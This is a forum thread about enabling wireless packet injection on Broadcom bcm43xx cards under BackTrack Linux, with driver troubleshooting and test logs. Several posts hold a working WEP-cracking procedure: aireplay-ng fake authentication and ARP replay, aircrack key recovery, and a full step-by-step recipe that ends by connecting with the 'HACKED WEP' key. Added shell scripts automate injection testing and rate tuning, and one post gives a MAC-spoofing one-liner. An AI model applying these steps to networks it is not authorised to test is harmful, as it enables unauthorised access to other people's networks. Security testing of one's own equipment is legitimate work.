bcm43xx injection support (it works!)


theprez98
06-17-2007, 05:01 PM
Testing still in progress, but Aireplay attack 9 (injection test) says it's working...
bt ~ # iwconfig eth0
eth0 IEEE 802.11b/g ESSID:off/any Nickname:"Broadcom 4318"
Mode:Monitor Frequency=2.437 GHz Access Point: Invalid
Bit Rate=1 Mb/s Tx-Power=18 dBm
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

bt ~ # ifconfig eth0 up
bt ~ # iwconfig eth0 mode Monitor channel 6
bt ~ # aireplay-ng -9 -e WOPR -a 00:14:BF:1C:CF:E3 eth0
11:59:46 Trying broadcast probe requests...
11:59:47 No Answer...
11:59:47 Found 1 AP

11:59:47 Trying directed probe requests...
11:59:47 00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
11:59:53 Ping (min/avg/max): 1.608ms/29.276ms/137.090ms
11:59:53 9/30: 30%

11:59:53 Injection is working!

theprez98
06-17-2007, 05:27 PM
UPDATE

Injection works with bcm43xx!

Aireplay-ng attacks 1 and 3...

I injected for ~60 seconds and captured ~5400 IVs with airodump.
bt ~ # aireplay-ng -1 0 -e WOPR -a $AP -h $WIFI eth0
12:24:20 Waiting for beacon frame (BSSID: 00:14:BF:1C:CF:E3)
12:24:20 Sending Authentication Request
12:24:20 Authentication successful
12:24:20 Sending Association Request
12:24:22 Association successful :-)
bt ~ # aireplay-ng -3 -b $AP -h $WIFI eth0
Saving ARP requests in replay_arp-0617-122426.cap
You should also start airodump-ng to capture replies.
12:24:32 Packets per second adjusted to 375nt 1380 packets...(240 pps)
12:24:36 Packets per second adjusted to 282ent 2033 packets...(265 pps)
12:24:43 Packets per second adjusted to 212ent 3225 packets...(262 pps)
12:24:55 Packets per second adjusted to 159ent 5245 packets...(237 pps)
12:25:04 Packets per second adjusted to 120ent 6220 packets...(216 pps)
12:25:10 Packets per second adjusted to 90sent 6599 packets...(205 pps)
12:25:12 Packets per second adjusted to 68sent 6644 packets...(203 pps)
Read 10231 packets (got 3907 ARP requests), sent 7456 packets...(164 pps)

theprez98
06-17-2007, 06:14 PM
The final step was using the ptw attack:

~40,000 packets injected in <5 minutes.

bt ~ # aircrack-ptw wopr-03.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:14:BF:1C:CF:E3 keyindex=0
stats for bssid 00:14:BF:1C:CF:E3 keyindex=0 packets=39453
Found key with len 13: <<hidden>>

theprez98
06-17-2007, 06:16 PM
The Wiki has been edited to reflect that the bcm43xx patch does in fact support injection.

shamanvirtuel
06-17-2007, 06:36 PM
Test it like this.....
aireplay-ng --test -i rausb0 eth0

rausb0 is another card in monitor mode on the same channel as eth0; it will act as an AP.
eth0 is the card you want to test.

It will output the test results of each attack like this:
attack -1 OK
attack -2 OK
attack......

It's card-to-card injection, really useful, but it needs 2 cards in monitor mode on the same channel.

Hope this helps make the test results more accurate.

theprez98
06-17-2007, 06:58 PM
Card-to-card injection not working... but as far as I am concerned, from the results above, bcm43xx does in fact support injection.
bt ~ # aireplay-ng --test -i ath1 eth0
13:55:47 Trying broadcast probe requests...
13:55:48 Injection is working!
13:55:48 Found 1 AP

13:55:48 Trying directed probe requests...
13:55:48 00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
13:55:56 Ping (min/avg/max): 1.584ms/1.601ms/1.629ms
13:55:56 3/30: 10%


13:55:56 Trying card-to-card injection...
13:55:58 Attack -0: Failed
13:56:00 Attack -1 (open): Failed
13:56:02 Attack -1 (psk): Failed
13:56:04 Attack -2/-3/-4: Failed
13:56:07 Attack -5: Failed

shamanvirtuel
06-17-2007, 07:11 PM
According to this, yes, but it's strange that the attacks failed... are the cards on the same channel? It's necessary to initiate card-to-card injection...

But according to what I see in your results... it works.

theprez98
06-17-2007, 07:14 PM
According to this, yes, but it's strange that the attacks failed... are the cards on the same channel? It's necessary to initiate card-to-card injection...

But according to what I see in your results... it works.
I'll check again when I get home...can't work too hard on Father's Day!!!

theprez98
06-17-2007, 11:17 PM
I re-initialized both cards monitor mode ensuring they were both on the same channel...with the exception of attack 5, the test shows that the bcm43xx driver is not only patched for injection, but works. A manual test of attack 5 also failed.
bt ~ # aireplay-ng --test -i eth0 ath2
18:14:19 Trying broadcast probe requests...
18:14:19 Injection is working!
18:14:20 Found 1 AP

18:14:20 Trying directed probe requests...
18:14:20 00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
18:14:23 Ping (min/avg/max): 1.606ms/37.455ms/141.992ms
18:14:23 22/30: 73%


18:14:23 Trying card-to-card injection...
18:14:23 Attack -0: OK
18:14:23 Attack -1 (open): OK
18:14:23 Attack -1 (psk): OK
18:14:23 Attack -2/-3/-4: OK
18:14:25 Attack -5: Failed
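The -9 run in the first post and the two --test runs above are graded by eye. The shell snippet below is an added example, not code from this thread or from the aircrack-ng project: it reads an aireplay-ng -9 / --test transcript on stdin and prints whether injection is working, how many of the 30 directed probes the AP answered, and how many card-to-card attacks reported "Failed". The 50% cut-off for calling a result "weak" is an assumption chosen for this example, and the three sample transcripts are constructed from the outputs posted in this thread.

```shell
#!/bin/sh
# Added example (not from the thread or from aircrack-ng): grade an
# aireplay-ng -9 / --test transcript read on stdin. Prints one line:
#   <verdict> <directed-probe-percent> <card-to-card attacks that Failed>
# verdict is "working" (the driver injects and the AP answered >= 50% of the
# directed probes), "weak" (injects, but the AP answered fewer; in this thread
# that meant being too far from the AP) or "not_working" (no
# "Injection is working!" line at all). The 50% threshold is an assumption.
grade_injection_test() {
    log=$(cat)
    # last "N/30: P%" line -> P
    pct=$(printf '%s\n' "$log" | sed -n 's|.*/30: \([0-9][0-9]*\)%.*|\1|p' | tail -n 1)
    [ -n "$pct" ] || pct=0
    # "|| true": grep -c exits 1 when the count is 0, which would trip set -e
    failed=$(printf '%s\n' "$log" | grep -c 'Attack .*: Failed' || true)
    if ! printf '%s\n' "$log" | grep -q 'Injection is working!'; then
        verdict=not_working
    elif [ "$pct" -lt 50 ]; then
        verdict=weak
    else
        verdict=working
    fi
    echo "$verdict $pct $failed"
}

# Constructed sample transcripts, copied from the outputs posted in this thread.
sample_good() {      # both cards on channel 6, only attack -5 failed
    cat <<'EOF'
18:14:19 Trying broadcast probe requests...
18:14:19 Injection is working!
18:14:20 Found 1 AP

18:14:20 Trying directed probe requests...
18:14:20 00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
18:14:23 Ping (min/avg/max): 1.606ms/37.455ms/141.992ms
18:14:23 22/30: 73%

18:14:23 Trying card-to-card injection...
18:14:23 Attack -0: OK
18:14:23 Attack -1 (open): OK
18:14:23 Attack -1 (psk): OK
18:14:23 Attack -2/-3/-4: OK
18:14:25 Attack -5: Failed
EOF
}
sample_weak() {      # first run, second card not on the same channel
    cat <<'EOF'
13:55:47 Trying broadcast probe requests...
13:55:48 Injection is working!
13:55:48 Found 1 AP

13:55:48 Trying directed probe requests...
13:55:48 00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
13:55:56 Ping (min/avg/max): 1.584ms/1.601ms/1.629ms
13:55:56 3/30: 10%

13:55:56 Trying card-to-card injection...
13:55:58 Attack -0: Failed
13:56:00 Attack -1 (open): Failed
13:56:02 Attack -1 (psk): Failed
13:56:04 Attack -2/-3/-4: Failed
13:56:07 Attack -5: Failed
EOF
}
sample_dead() {      # a card that sees the AP but gets no probe answered
    cat <<'EOF'
11:59:46 Trying broadcast probe requests...
11:59:47 No Answer...
11:59:47 Found 1 AP

11:59:47 Trying directed probe requests...
11:59:47 [router mac] - channel: 6 - 'linksys'
11:59:53 0/30: 0%
EOF
}

# On a live card: aireplay-ng -9 -e WOPR -a 00:14:BF:1C:CF:E3 eth0 2>&1 | grade_injection_test
sample_good | grade_injection_test     # working 73 1
sample_weak | grade_injection_test     # weak 10 5
sample_dead | grade_injection_test     # not_working 0 0
```

The grader only looks at three things aireplay-ng always prints, so it works on the -9 output alone (the failed-attack count is then 0) as well as on the longer --test output; a "weak" verdict with a 100% OK card-to-card section, as in the first --test run above, is the pattern that pointed at the second card being on the wrong channel.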

Barry
06-17-2007, 11:21 PM
SSID is WOPR? That's funny!

theprez98
06-17-2007, 11:22 PM
SSID is WOPR? That's funny!
Yeah, I've had it that way for years. Amazingly enough, it's fairly unique.

shamanvirtuel
06-18-2007, 09:06 AM
"I re-initialized both cards monitor mode ensuring they were both on the same channel..."

I was sure that was why card-to-card injection failed the first time....
If the basic injection test is OK.... at least the -1 attack must say OK in card-to-card injection...........

ats1080
06-21-2007, 11:37 PM
This is awesome. Are these patches going to be put into the patched BT2 coming out soon?

theprez98
06-21-2007, 11:40 PM
This is awesome. Are these patches going to be put into the patched BT2 coming out soon?
The bcm43xx drivers are already patched in BT2 final; no need to do anything further.

level
06-28-2007, 08:43 PM
theprez98,

Have you tried it with the -4 attack? I can't seem to get it to work, but when using the same parameters on a different interface (Linksys WUSB54G card), it works fine.

theprez98
06-28-2007, 09:41 PM
theprez98,

Have you tried it with the -4 attack? I can't seem to get it to work, but when using the same parameters on a different interface (Linksys WUSB54G card), it works fine.
When I did the card-to-card injection test, all attacks worked. I haven't tried it beyond that.

theprez98
06-30-2007, 05:54 AM
Motorola WN825G v2 (http://backtrack.offensive-security.com/index.php?title=HCL:Wireless#Motorola_WN825G_v2) (Broadcom 4306 chipset, bcm43xx driver) added to Wiki.

shamanvirtuel
06-30-2007, 07:03 AM
Is your card a 4318?
If yes, there's no way to inject with it.... I'm preparing a wiki article for this....
As far as I know, only 4306 and 4311 will work.

theprez98
06-30-2007, 07:06 AM
Is your card a 4318?
If yes, there's no way to inject with it.... I'm preparing a wiki article for this....
As far as I know, only 4306 and 4311 will work.
See above, the Motorola is a 4306. My internal PCI (the original subject of this thread) is a 4318 and it does in fact inject.

shamanvirtuel
06-30-2007, 07:10 AM
The one I've tested can only do the -0 and -1 attacks.... I need to do some further tests maybe.... So it works...... strange that my 4318 doesn't.......

theprez98
07-07-2007, 06:22 AM
This page (http://bcm43xx.berlios.de/?go=devices) describes which Broadcom chip IDs are likely to work and which aren't.

My integrated wireless is a 4318 (listed as "unstable") and injected properly.

I have a Motorola WN825G with a 4306 (listed as "supported") but haven't gotten quite the same results with it...yet.

shamanvirtuel
07-07-2007, 06:46 AM
"4311 PCI-E: Supported for kernel 2.6.20.6 and later"
I got one of these...
but it's quite unstable: I can't set the rate... it stays at 1 Mb/s.... can't inject either.

Do you know where I can see the subversion of the kernel we have in BT2?

I know it's 2.6.20.X but 2.6.20.6 is needed.

Thx

sin_gage
11-15-2007, 07:44 PM
As far as I know, only 4306 and 4311 will work.

Mine is a Dell Wireless 1390 WLAN Mini-PCI Card (rev 02) and I can't even connect to my wifi router using the wifi assistant... any suggestion why it's not working?

micked
11-15-2007, 10:22 PM
Sometimes this works for me;
just copy and paste it in the console:

ifconfig eth1 down && rmmod bcm43xx && modprobe bcm43xx && macchanger -m 00:11:22:33:44:55 eth1 && ifconfig eth1 up && iwconfig eth1 rate 1M

sin_gage
11-15-2007, 10:56 PM
It didn't work for me, and BTW my interface name is eth0, not eth1.

shamanvirtuel
11-16-2007, 01:54 AM
eth0? Sure? Usually this is a wired card... :confused:

sin_gage
11-16-2007, 02:49 AM
eth0? Sure? Usually this is a wired card... :confused:

Yes, sure: my ethernet interface is eth1 and wireless is eth0. Also, mdk3 is working in beacon and probe mode but not in the others, and the aircrack-ng suite doesn't work. But today I tried aireplay-ng -9 -e linksys -a [router mac] eth0 and the following was my output:
11:59:46 Trying broadcast probe requests...
11:59:47 No Answer...
11:59:47 Found 1 AP

11:59:47 Trying directed probe requests...
11:59:47 [router mac] - channel: 6 - 'linksys'
11:59:53 0/30: 0%
I fail to understand:
1) Why can't I connect to my router to surf the net?
2) If my card doesn't support injection, then how can it inject beacons in mdk3 probe mode? (I have checked it using NetStumbler on another laptop.)
3) If it cannot scan networks in airmon-ng on channel 6, then how come it finds an AP when the above injection test is run?

mummysboy
11-20-2007, 02:24 PM
I too am having problems getting injection to work on my Dell 1390.
I keep getting the error "Driver may not be patched for injection".

I read that BT2 Final has patched drivers, so does it mean my laptop is shite [well, it is a Dell, I suppose] or is there something else I can try?

AndiC500
12-03-2007, 04:39 PM
HP/Compaq Presario C500 (c550em)
06:00.0 Network controller: Broadcom Corporation Dell Wireless 1390 WLAN Mini-PCI Card (rev 01)

I can confirm that this supports injection; I upgraded to the latest SVN version.

Sending the fake ARPs did produce a bof.
I can't remember the output it produced, but I'll check their site to see if it is a known issue.

Sagan
12-20-2007, 03:06 AM
My laptop's integrated bcm4318 worked like a charm. If you can handle it at 10 PPS. It took a little over an hour to get enough ARPs to crack the WEP. I wish it was faster.

*tested on BT3*

vipzen
02-01-2008, 01:58 PM
My Broadcom 4318 (in an HP Pavilion ze2000) cracked a 40-bit WEP key in about 10 minutes.

The proof: img137.imageshack.us/img137/5416/broadcomym8.gif

The tip:
If you get a "wi_write(): Illegal seek" error from the aireplay command, just append "-x 30" at the end :)

teachscuba
02-15-2008, 03:58 AM
Can report that the BCM 4306 in a Dell 1350 injects and works fine....

At first, using default settings, I'd get a stop with the error message saying it couldn't do a "write"...

Advised to use -x 30; I opted for -x 250 and it ran perfectly... tried again at -x 300, -x 350, -x 400... which was the highest that ran successfully.

However, it varies with the AP being pinged... once, -x 10 was required....

So, if you get a write error, just adjust your -x ??? setting.

Nice thing is that you don't lose the captured packets you already have... it just creates another file with the name incremented by 1....

Glad folks are mentioning the use of the "-x ???" option to work around the "write_error"; sure helped me!

teach

Maraudir
03-11-2008, 12:52 AM
This may be the wrong place for this and I am sorry if that is the case but I was wondering if the BCM4318 chipset was capable of injection for Windows programs. If anyone have any ideas or can point me in the right direction I would appreciate it. Thanks.

bb_EcKo
03-12-2008, 05:50 AM
This may be the wrong place for this and I am sorry if that is the case but I was wondering if the BCM4318 chipset was capable of injection for Windows programs. If anyone have any ideas or can point me in the right direction I would appreciate it. Thanks.

Don't want to sound cold-hearted, but this is indeed the wrong place to ask, as this is a Linux forum.
You might want to try at aircrack's forum.

Maraudir
03-12-2008, 06:46 AM
That wasn't cold at all. Thank you very much.

TTA89
03-22-2008, 08:01 AM
I have a D410 with a Broadcom that I messed around with for a few hours tonight. It works until it tries to inject and then gives the "wi_write(): Illegal seek" error that a lot of people see. I played with a Linksys USB that wouldn't do any injection and then had an old Cisco Aironet 350 that wouldn't go into monitor mode.

What a PIA... I ordered an Atheros mini-PCI card off eBay for $25 bucks tonight. See if I can get this working!

G_Dub
03-24-2008, 07:40 PM
I have also got injection to work with a Broadcom 4318 on a Compaq V2000 using -x 100. Very slow but effective; I was able to crack my WEP in about 5 mins. The range is also very limited, as others have reported. I tried to crack my neighbor's WEP (with permission, of course) but was too far away to inject; I had to get within 100 ft of his router. I have also had problems surfing the net with this card. I can log onto my network and go onto the internet, but the connection is very unstable: it will work great one minute, then stop working. I'm gonna check out some new cards soon.

DEAGLE
03-26-2008, 08:12 AM
I'm kinda new to Linux, a little help would be appreciated.

I have an HP Pavilion dv6000 with a bcm4311. I can bring the card up but I can't connect to my AP using the wifi manager or the CLI, even when I disable authentication. Here's what I typed:


bt ~ # ifconfig
eth0 Link encap:Ethernet HWaddr 00:00:6C:0D:27:E3
inet addr:192.168.0.19 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22838 errors:0 dropped:0 overruns:0 frame:0
TX packets:15053 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:27555547 (26.2 MiB) TX bytes:2215315 (2.1 MiB)
Interrupt:19 Base address:0xe000

eth1 Link encap:UNSPEC HWaddr 00-00-00-1A-73-63-00-00-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:338 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:15236 (14.8 KiB)
Interrupt:10

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:21 errors:0 dropped:0 overruns:0 frame:0
TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4048 (3.9 KiB) TX bytes:4048 (3.9 KiB)

bt ~ # iwconfig eth1 essid SKY50023
bt ~ # iwconfig eth1 channel 11
bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

eth1 IEEE 802.11b/g ESSID:"SKY50023" Nickname:"Broadcom 4311"
Mode:Monitor Frequency=2.462 GHz Access Point: Invalid
Bit Rate=1 Mb/s Tx-Power=18 dBm
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
As you can see, it is looking for my AP but it can't find it. I have no encryption; I'm just trying to get it to connect.

thanks for the help in advance

.lonewolf
03-26-2008, 09:51 AM
You know the Broadcom isn't well supported in BT?

Check the wiki > Wireless Card Compatibility (http://backtrack.offensive-security.com/index.php/HCL:Wireless)

TTA89
03-26-2008, 10:16 AM
I have a D410 with a Broadcom that I messed around with for a few hours tonight. It works until it tries to inject and then gives the "wi_write(): Illegal seek" error that a lot of people see. I played with a Linksys USB that wouldn't do any injection and then had an old Cisco Aironet 350 that wouldn't go into monitor mode.

What a PIA... I ordered an Atheros mini-PCI card off eBay for $25 bucks tonight. See if I can get this working!

Just to recap here, I received the Atheros mini-PCI card today and it works perfectly. For anyone trying to get all this stuff to work, just order a card off eBay. They are cheap!

It injects at 500pps too. :cool:

DEAGLE
03-26-2008, 12:45 PM
Just to recap here, I received the Atheros mini-PCI card today and it works perfectly. For anyone trying to get all this stuff to work, just order a card off eBay. They are cheap!

It injects at 500pps too. :cool:
I've already ordered a new card but it isn't here yet; I just wanted to know what I'm doing wrong. I know the Broadcom cards are a pain in the arse because of their closed-source drivers, but I don't understand why I can't even connect to my own AP just to browse the net. I have to hook up the ethernet cable. If anyone can tell me, I'd appreciate it.

unclebens
03-31-2008, 07:51 PM
Hi everyone (and sorry for my English)
I have a Broadcom wireless card (chipset 4311) on my HP laptop.
I'm using BT3beta.
After booting, I launch a shell then enter
ifconfig -> there's only one interface: lo
then
iwconfig -> there are two interfaces: lo again, and eth0, which corresponds to my bcm4311 card (configured in managed mode)
If I try to use airodump-ng (airodump-ng eth0) it says that the interface does not exist (understandable)
then
iwconfig eth0 mode monitor -> OK (when I run iwconfig again it shows that my card is now in monitor mode)
then
airodump-ng eth0 -> there's no error message, the usual airodump-ng screen appears, but no station/network is found, although I can find more than 30 APs when I'm on Windows, and I'm right next to my own AP (less than 2 meters!)
So what am I supposed to do? I'm not talking about injection, just about monitoring for now!!! And I read lots of topics about bcm4311; none of them answered my problem! So please help!
Thanks

Uncle'

unclebens
04-17-2008, 06:37 PM
UP!
Can no one help me explain what happens?
thx

elg3ne
04-20-2008, 02:23 PM
I have a Dell Inspiron 1525 with a Broadcom 4311 wireless chipset and I was able to crack 64- and 128-bit WEP keys in just 5 minutes.

Injection is working fine. I use BT3b USB bootable (900+MB file size). You must have a good signal from the AP. It will not work if you are too far from the AP.

Here is the step by step I do on cracking WEP key.

### Start the wireless interface in monitor mode

airmon-ng stop eth0
airmon-ng start eth0

OR

iwconfig eth0 mode monitor

### Start airodump-ng to capture the IVs

airodump-ng -c [AP CHANNEL] --bssid [AP MAC] -w [OUTPUT FILENAME] eth0

### To associate with an access point, use fake authentication:

aireplay-ng -1 0 -e [AP SSID] -a [AP MAC] -h [YOUR WLAN MAC] eth0

### Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -x 300 -b [AP MAC] -h [YOUR WLAN MAC] eth0

### Run aircrack-ng to obtain the WEP key

aircrack-ng -z -b [AP MAC] [OUTPUT FILENAME].cap

### Use the WEP key to connect

iwconfig
iwconfig eth0 mode managed
iwconfig
ifconfig eth0 down
iwconfig eth0 essid [NETWORKNAME] key [HACKED WEP]
ifconfig eth0 up
dhcpcd eth0
ping yahoo.com



If you get a "wi_write(): Illegal seek" error from the "aireplay-ng -3 -x 300 -b [AP MAC] -h [YOUR WLAN MAC] eth0" command, just lower the "-x" value.
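Several posts above (vipzen, teachscuba and this one) settle on a -x value by trial and error: run aireplay-ng -3, see whether it dies with "wi_write(): Illegal seek", lower -x and try again. The script below is an added example, not code from this thread or from aircrack-ng: it automates that loop, probing from a starting rate downwards and printing the first rate at which aireplay-ng is still running after a few seconds without that error. fake_aireplay is a hypothetical stand-in for aireplay-ng so the script runs offline; the 250 pps limit it enforces, the 3/4 back-off step, and the MAC addresses in the demo call (taken from earlier posts) are assumptions for the example.

```shell
#!/bin/sh
# Added example (not from the thread or from aircrack-ng): automate the -x
# trial-and-error. On bcm43xx, aireplay-ng aborts with "wi_write(): Illegal seek"
# when the injection rate is too high, so this probes rates from <start_pps>
# downwards, cutting by a quarter each time, and prints the first rate at which
# aireplay-ng is still running after <probe_secs> seconds without that error.
#
#   inject_with_backoff <command> <start_pps> <min_pps> <probe_secs> <aireplay args...>
#
# <command> is run as:  <command> -x <pps> <aireplay args...>
inject_with_backoff() {
    cmd=$1; pps=$2; min_pps=$3; probe_secs=$4; shift 4
    start=$pps
    tmp=$(mktemp) || return 1
    while [ "$pps" -ge "$min_pps" ]; do
        echo "probing -x $pps" >&2
        "$cmd" -x "$pps" "$@" >"$tmp" 2>&1 &
        pid=$!
        # watchdog: a replay still alive after probe_secs is a success, so stop it
        ( sleep "$probe_secs"; kill "$pid" 2>/dev/null ) &
        wpid=$!
        status=0; wait "$pid" || status=$?
        kill "$wpid" 2>/dev/null || true
        if grep -q 'wi_write(): Illegal seek' "$tmp"; then
            echo "-x $pps: driver write error, backing off" >&2
            pps=$((pps * 3 / 4))
        elif [ "$status" -gt 128 ]; then
            rm -f "$tmp"            # killed by the watchdog: ran the whole window cleanly
            echo "$pps"
            return 0
        else
            cat "$tmp" >&2          # died for another reason (no beacon, not associated, ...)
            rm -f "$tmp"
            return 1
        fi
    done
    echo "no rate between $start and $min_pps pps worked" >&2
    rm -f "$tmp"
    return 1
}

# Hypothetical stand-in for aireplay-ng so the example runs offline. It mimics
# the symptom from the thread: any rate above 250 pps (an assumed limit) hits
# the driver error; otherwise it "keeps injecting" until the watchdog stops it.
fake_aireplay() {
    rate=0
    while [ $# -gt 0 ]; do
        if [ "$1" = "-x" ]; then rate=$2; shift; fi
        shift
    done
    if [ "$rate" -gt 250 ]; then
        echo "wi_write(): Illegal seek"
        return 1
    fi
    echo "Read 0 packets (got 0 ARP requests), sent 0 packets...($rate pps)"
    exec sleep 60
}

# Offline demo: 400 and 300 hit the error, 225 runs cleanly, so 225 is printed.
# On a real card the equivalent call would be, e.g.:
#   inject_with_backoff aireplay-ng 400 30 10 -3 -b 00:14:BF:1C:CF:E3 -h 00:11:22:33:44:55 eth0
inject_with_backoff fake_aireplay 400 30 1 -3 -b 00:14:BF:1C:CF:E3 -h 00:11:22:33:44:55 eth0
```

On a real card, keep airodump-ng capturing while this runs and do the fake authentication (attack -1) first, so that an early exit really is the rate error and not a missing association; once a rate is printed, run aireplay-ng -3 -x <rate> ... in the foreground with it. The rate that survives the write error is an upper bound on what the driver will accept, not on what the AP answers, so the replay may still crawl along at the 10 pps reported earlier in this thread.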

unclebens
05-03-2008, 01:49 PM
Thanks for the answer, but the problem is I can't see any AP when I use airodump-ng!
So what am I supposed to do?

uncle'

colemar
05-10-2008, 09:31 AM
Hi there, I have a question.
Is this wifi card supported for this topic??
BCM4306/BCM2050

sergiom99
06-25-2008, 11:14 PM
I have a BCM4328 (HP DV6646us) and iwconfig says 'no wireless extensions'. Should I do something else to configure it??

Mr-Protocol
06-29-2008, 03:42 PM
Is this injection available by just running the live CD, without messing with drivers for injection?

I would like to know if I can have a 'stock' live CD with my BCM 4306 on my Compaq Presario R3000 series laptop. Or do I need to use fwcutter like I had to in BT2?

_SEREGA_
07-01-2008, 05:47 AM
Help me. In BackTrack 3 final, aireplay-ng does not work with my bcm4312 card.
Is it necessary to first associate with the AP, and then do the injection?
P.S.
Excuse my English, because I'm from Russia!

=Tron=
07-01-2008, 06:00 AM
Is it necessary to first associate with the AP, and then do the injection?

Yes, you will have to be successfully associated with the AP in order for it to accept the packets you inject into it.